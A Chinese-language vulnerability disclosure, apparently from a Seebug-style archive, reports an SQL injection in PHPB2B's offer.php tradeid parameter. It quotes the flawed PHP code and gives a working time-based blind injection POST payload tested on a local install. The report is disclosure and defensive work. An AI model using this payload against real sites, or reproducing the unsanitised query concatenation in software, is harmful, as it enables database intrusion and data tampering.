### 简要描述: RT ### 详细说明: ``` 注入链接:/virtual-office/offer.php 注入参数:tradeid 漏洞代码:(第346行开始) if(isset($_POST['refresh'])){ if (!empty($_POST['refresh']) && !empty($_POST['tradeid'])) { $vals = array(); $pre_submittime = $pdb->GetOne("select max(submit_time) from {$tb_prefix}trades where member_id=".$the_memberid); if ($pre_submittime>($time_stamp-$tMaxDay*86400)) { flash("allow_refresh_day"); } $vals['submit_time'] = $time_stamp; $vals['expire_days'] = 10; $vals['expire_time'] = $time_stamp+(24*3600*$vals['expire_days']); $conditions[]= "status='1'"; $ids = implode(",", $_POST['tradeid']); $conditions[]= "id in (".$ids.")"; $condition = implode(" AND ", $conditions); $sql = "update ".$trade->getTable()." set submit_time=".$time_stamp.",expire_days=10,expire_time=".$vals['expire_time']." where ".$condition; $result = $pdb->Execute($sql); } } $ids = implode(",", $_POST['tradeid']);从前台获取post数组参数tradeid后直接使用implode函数分割后直接拼接sql语句导致Update注入漏洞。 ``` ### 漏洞证明: ``` 漏洞测试:...
### 简要描述: RT ### 详细说明: ``` 注入链接:/virtual-office/offer.php 注入参数:tradeid 漏洞代码:(第346行开始) if(isset($_POST['refresh'])){ if (!empty($_POST['refresh']) && !empty($_POST['tradeid'])) { $vals = array(); $pre_submittime = $pdb->GetOne("select max(submit_time) from {$tb_prefix}trades where member_id=".$the_memberid); if ($pre_submittime>($time_stamp-$tMaxDay*86400)) { flash("allow_refresh_day"); } $vals['submit_time'] = $time_stamp; $vals['expire_days'] = 10; $vals['expire_time'] = $time_stamp+(24*3600*$vals['expire_days']); $conditions[]= "status='1'"; $ids = implode(",", $_POST['tradeid']); $conditions[]= "id in (".$ids.")"; $condition = implode(" AND ", $conditions); $sql = "update ".$trade->getTable()." set submit_time=".$time_stamp.",expire_days=10,expire_time=".$vals['expire_time']." where ".$condition; $result = $pdb->Execute($sql); } } $ids = implode(",", $_POST['tradeid']);从前台获取post数组参数tradeid后直接使用implode函数分割后直接拼接sql语句导致Update注入漏洞。 ``` ### 漏洞证明: ``` 漏洞测试: http://127.0.0.1/phpb2b/virtual-office/offer.php Post: refresh=1&tradeid[]=1111)||if((length(user())=0),1,sleep(5))# 这里为了测试把注入的sql语句打印出来 ``` [<img src="https://images.seebug.org/upload/201502/091043347bcf26026c8f2fa3535c7da3030d8c5e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091043347bcf26026c8f2fa3535c7da3030d8c5e.png) ``` Mysql日志: ``` [<img src="https://images.seebug.org/upload/201502/091043271c06b5a5be5618687358d5145a02f84c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091043271c06b5a5be5618687358d5145a02f84c.png) ``` 成功执行延时注入 ```
